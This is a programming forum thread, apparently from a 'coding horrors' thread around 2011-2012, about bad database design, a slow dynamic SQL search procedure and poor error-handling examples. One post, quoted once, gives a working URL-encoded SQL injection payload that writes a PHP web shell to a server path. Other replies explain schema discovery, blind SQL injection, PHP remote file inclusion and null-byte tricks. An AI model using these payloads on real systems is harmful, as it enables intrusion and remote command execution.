|
point of return posted:The other pathology is the reason that Fast Eddie has to delete inactive threads. It's because if he doesn't, the database will start chugging due to having too many tables, as the database has a table for every thread. Please, please tell me you're making it up.
|
# ? Dec 31, 2011 01:21 |
|
|
# ? May 21, 2024 01:30 |
|
McGlockenshire posted:I ... I've never seen this one happen in the real world. Nobody is this stupid. Nobody. sorry, there are worse things
|
# ? Dec 31, 2011 02:03 |
|
As somebody with no database experience whatsoever, how would a thread with its posts be represented? Each sub-forum a table, each thread a column and each new post a row?
|
# ? Dec 31, 2011 02:56 |
|
AlsoD posted:As somebody with no database experience whatsoever, how would a thread with its posts be represented? Each sub-forum a table, each thread a column and each new post a row? That is not how databases work. You could model it in three different tables: forums, threads and posts. A post would have a foreign key column to a thread, and a thread would have a foreign key column to a forum.
|
# ? Dec 31, 2011 02:59 |
|
AlsoD posted:As somebody with no database experience whatsoever, how would a thread with its posts be represented? Each sub-forum a table, each thread a column and each new post a row? code:
|
# ? Dec 31, 2011 05:23 |
csammis posted:
To expand some more on it, the basic idea is that you just lump all homogenous data together (all posts in threads are alike, so they all go together), have some properties/columns you can group the data by, and then the DBMS makes sure to store the data for you in a way so it's efficient to pull out all posts made in one specific thread or all posts made by one specific person, or similar.
|
|
# ? Dec 31, 2011 05:34 |
|
Suspicious Dish posted:That is not how databases work. You could model it in three different tables: forums, threads and posts. A post would have a foreign key column to a thread, and a thread would have a foreign key column to a forum. It's actually hard for me to imagine how you would model the DB so each thread has its own table. That must be pretty nasty.
|
# ? Dec 31, 2011 13:23 |
|
I'll start us off...code:
|
# ? Dec 31, 2011 17:00 |
|
Dicky B posted:I'll start us off... I counter with code:
|
# ? Dec 31, 2011 17:26 |
|
baquerd posted:I counter with &threadid=888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C'%3C%3Fphp%20system(%24_GET%5B%22command%22%5D)%3B%20%3F%3E'%20INTO%20OUTFILE%20'%2Fvar%2Fwww%2Fvictim.com%2Fshell.php'%2F*
|
# ? Dec 31, 2011 17:54 |
|
baquerd posted:I counter with code:
|
# ? Dec 31, 2011 18:38 |
|
code:
tef fucked around with this message at 18:58 on Dec 31, 2011 |
# ? Dec 31, 2011 18:56 |
|
tef posted:
Is this how you say "Come at me, bro" in PHP?
|
# ? Dec 31, 2011 19:30 |
|
Rainbow Pony Deluxe posted:Is this how you say "Come at me, bro" in PHP? No, this is the tvtropes forum javascript library in a nutshell
|
# ? Dec 31, 2011 19:34 |
|
AlsoD posted:As somebody with no database experience whatsoever, how would a thread with its posts be represented? Each sub-forum a table, each thread a column and each new post a row? As a general rule, if your application's everyday tasks involve creating and dropping (non-temporary) tables, or the number of tables in your database at any one time varies according to the application's state, you are doing something wrong. Each table in the database corresponds to things of a specific type. It is always wrong to have a system where there are multiple tables, one for each thing. (It is ok to have a system where there are a fixed number of tables, each table being for things of a specific type.)
|
# ? Dec 31, 2011 20:42 |
|
Fast Eddie's idea of "fixing" Solstace's page. As you can see, by replacing the hottips with something that doesn't parse, you, too, can claim your page is fixed.
|
# ? Jan 1, 2012 22:11 |
|
point of return posted:Fast Eddie's idea of "fixing" Solstace's page. As you can see, by replacing the hottips with something that doesn't parse, you, too, can claim your page is fixed. Haha that's amazing.
|
# ? Jan 1, 2012 22:38 |
|
BonzoESC posted:&threadid=888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C'%3C%3Fphp%20system(%24_GET%5B%22command%22%5D)%3B%20%3F%3E'%20INTO%20OUTFILE%20'%2Fvar%2Fwww%2Fvictim.com%2Fshell.php'%2F* How would a remote attacker know enough about the data schema to create a UNION query and copy the shell to that location? Unless you are just doing this hypothetically.
|
# ? Jan 2, 2012 20:55 |
|
iamthexander posted:How would a remote attacker know enough about the data schema to create a UNION query and copy the shell to that location? Some other system() commands previously to dump the schema!
|
# ? Jan 2, 2012 21:20 |
|
iamthexander posted:How would a remote attacker know enough about the data schema to create a UNION query and copy the shell to that location? I remember 8 or 9 years ago I ran a web server that I let other folks use. One guy I lent web space to created a "templating engine" where their URLs were all stuff along the lines of: code:
I stupidly forgot to turn off allow_url_fopen in the PHP install, which was enabled by default. So an attacker just had to hit code:
Thankfully this "feature" is no longer enabled by default in PHP. In PHP5 they split the access controls out for fopen() and include(), so under the default configuration, you can fopen() a URL but you cannot include() a URL. kitten smoothie fucked around with this message at 21:30 on Jan 2, 2012 |
# ? Jan 2, 2012 21:25 |
|
kitten smoothie posted:Thankfully this "feature" is no longer enabled by default in PHP. In PHP5 they split the access controls out for fopen() and include(), so under the default configuration, you can fopen() a URL but you cannot include() a URL. allow_url_fopen doesn't stop it, because it still allows php:/// URLs: code:
|
# ? Jan 2, 2012 22:44 |
|
kitten smoothie posted:
This is a horror unto itself quote:Thankfully this "feature" is no longer enabled by default in PHP. In PHP5 they split the access controls out for fopen() and include(), so under the default configuration, you can fopen() a URL but you cannot include() a URL. And soon, they'll get rid of the "feature" that allows you to pass untrusted user-input to file systems operations too Suspicious Dish posted:allow_url_fopen doesn't stop it, because it still allows php:/// URLs: ahahahaha!
|
# ? Jan 2, 2012 22:55 |
|
iamthexander posted:How would a remote attacker know enough about the data schema to create a UNION query and copy the shell to that location? Trial and error for the right number of columns in the union (it's a natural/counting number, ); and the path can be done by seeing if they're on dreamhost and guessing or by using something that throws up an error page. Edit: I had a metasploit 2 (the perl one, not the ruby one) module for doing this against phpnuke at one point.
|
# ? Jan 3, 2012 00:49 |
|
Well the obvious answer is reading the source (because it's open, or because of another vulnerability). Often with sql injection you can read the data schema out. Other times you get error messages with stack traces with column names. You can use wordlists too, and they're astonishingly effective. There is a whole lot of work around 'Blind SQL Injection too'. I haven't really been keeping up with this in the last decade so there is probably a few techniques I'm missing out.
|
# ? Jan 3, 2012 01:00 |
|
It depends on what the exploiter wants to do. If they're looking for something specific like CC#s then yeah, they'll probably grab the schema/sys.tables. Most of the exploits I see now though are all about spreading viruses/other exploits, so they just prepend an iframe (with payload) to any text field and then TRUNC the rest.
|
# ? Jan 3, 2012 01:42 |
|
Meeting in.. ooh, 7h or thereabouts, where we all (developers) get round a table and tell them (Management(tm)) that we've finished testing. Just testing. Not actually fixed the 120-odd issues we found during the test cycle yet, but ho hum. What's the horror? The fact that they expected a 4 week test+fix cycle to b e done in 1 week, over christmas, when I'm the only one working out of 4 developers. Did I mention that they want a "released" version for an install on Friday? /kills self
|
# ? Jan 3, 2012 02:24 |
|
kalleth posted:Meeting in.. ooh, 7h or thereabouts, where we all (developers) get round a table and tell them (Management(tm)) that we've finished testing. Just testing. Not actually fixed the 120-odd issues we found during the test cycle yet, but ho hum. Similar-but-different situation as a contractor a few years ago, we wrote up a schedule and rough plan for a massive project replacing an existing ERP with a new, re-designed one. Our project manager passed the schedule on to the guy that was writing up the proposal and meeting with the potential client, and the guy saw the point "Planning Stage Complete: 12/03/06" and read that as "WE ARE PLANNING TO COMPLETE THE PROJECT ON THIS DAY", completely ignoring the 5+ months of work listed (and dated) after that on the same page. The client accepted the proposal, the guy came to us and said "It was accepted, the schedule is perfect so just stick to that" and on the 12th the client turned up expecting the entire thing complete.
|
# ? Jan 3, 2012 05:09 |
|
tef posted:And soon, they'll get rid of the "feature" that allows you to pass untrusted user-input to file systems operations too My favourite was the exploit where if you had a PHP file doing something like: code:
code:
|
# ? Jan 3, 2012 05:48 |
|
the poison null byte attack. in perl, they would check the file extension with a regular expression, (which would deal with the null byte), before passing it to open (which would truncate it). code:
|
# ? Jan 3, 2012 08:43 |
|
That error message is the real horror. It is most definitely not a TypeError.
|
# ? Jan 3, 2012 15:01 |
|
Zombywuf posted:That error message is the real horror. It is most definitely not a TypeError. Are strings with a '\0' as the last character a different type to other strings? That would explain the message (as well as being a horror in its own right). VVVVV: in Haskell, a strongly typed language, type and kind mean very different things. A kind is, essentially, the type of a type. What do you mean? gonadic io fucked around with this message at 19:15 on Jan 3, 2012 |
# ? Jan 3, 2012 15:35 |
|
A string with embedded nulls is most definitely not a value of type null-terminated-string (seeing as how it's not even representable in that type), so how is passing such a thing to a function expecting a null-terminated-string not a type error? Is this sort of like the hungarian thread where people insisted that there was an inherent distinction between the "type" and "kind" because they're used to weak type systems?
|
# ? Jan 3, 2012 17:56 |
|
Plorkyeran posted:A string with embedded nulls is most definitely not a value of type null-terminated-string (seeing as how it's not even representable in that type), so how is passing such a thing to a function expecting a null-terminated-string not a type error? If python had that kind of dependant structural typing in any way shape or form then you might be on to something here. It doesn't however.
|
# ? Jan 3, 2012 18:59 |
|
tef posted:the poison null byte attack. code:
|
# ? Jan 3, 2012 20:04 |
|
python ruby
|
# ? Jan 3, 2012 20:22 |
|
kalleth posted:Meeting in.. ooh, 7h or thereabouts, where we all (developers) get round a table and tell them (Management(tm)) that we've finished testing. Just testing. Not actually fixed the 120-odd issues we found during the test cycle yet, but ho hum. This is so familiar.
|
# ? Jan 3, 2012 20:44 |
|
I was digging around one of our application DBs today rather than do the work I'm supposed to be doing and I've found the work of some kind of insane genius. This app is from 2004 and has cripplingly poor search performance that we've never really spent time looking into in any detail, it turns out that the search is hitting the DB roughly as follows.... 1) Aspx page makes a call to a stored procedure with the search criteria, there can be anything up to 40 of these although some are always null, others don't exist or can't actually be specified in the web front end. 2) The procedure defines a shitload of strings. 3) The strings are used to "dynamically" build a query by churning through nearly 1000 lines of SQL that works something like this: code:
4) The query times out because it includes a call to a scalar function that uses a cursor to pull out related data (across a linkserver) for every row of the result set. If you use an instring text search for something fairly generic (i.e. the kind of thing you might search for) this takes the execution time directly on the DB from like 1 second to 3+minutes as it churns through thousands of calls to this stupid cursor function. The page timeout is 30 seconds. All I can think is that it was intended to provide some kind of query optimisation by cutting out excessive JOIN operations for queries with small numbers of attributes, but why on earth would you do it like this. Bonus: The DB has a function declared to convert a passed date into the format 03-Jan-2012 by using string manipulation. This is functionally identical to the results of convert(varchar,getdate(),106) Edit: Extra bonus, the view used for the search is badly written so all queries have to have "DISTINCT" whacked on the front of them to return sane results which is always a mark of a well thought out db structure. Powerful Two-Hander fucked around with this message at 23:25 on Jan 3, 2012 |
# ? Jan 3, 2012 23:13 |
|
Powerful Two-Hander posted:Oh god. That said, the dynamic query isn't the problem here, if you want poo poo to work you need to scrap the one-line-at-a-time methodology and return the entire resultset at once. Reminds me of a TDWTF where an address-book application was coded so that to search for users was to run a query for users, then for each user call a stored procedure to get their address.
|
# ? Jan 4, 2012 06:59 |
|
Matlab 2011b Help on MException, the matlab error class posted:
The f* functions are basically the same as in C. fread doesn't throw errors if it is given a valid file id, and there is some other error, such as a network outage. There are other errors that can occur during read (out of memory, etc.) that are passed silently. And as a nitpick the disp line is redundant. This would just be run of the mill bad but it is literally the example that Matlab gives for error handling in their own documentation, for a relatively new error handling technique that they want people to use.
|
# ? Jan 6, 2012 04:37 |
|
|
# ? May 21, 2024 01:30 |
|
From the desk behind me:code:
Zamujasa fucked around with this message at 10:00 on Jan 6, 2012 |
# ? Jan 6, 2012 09:57 |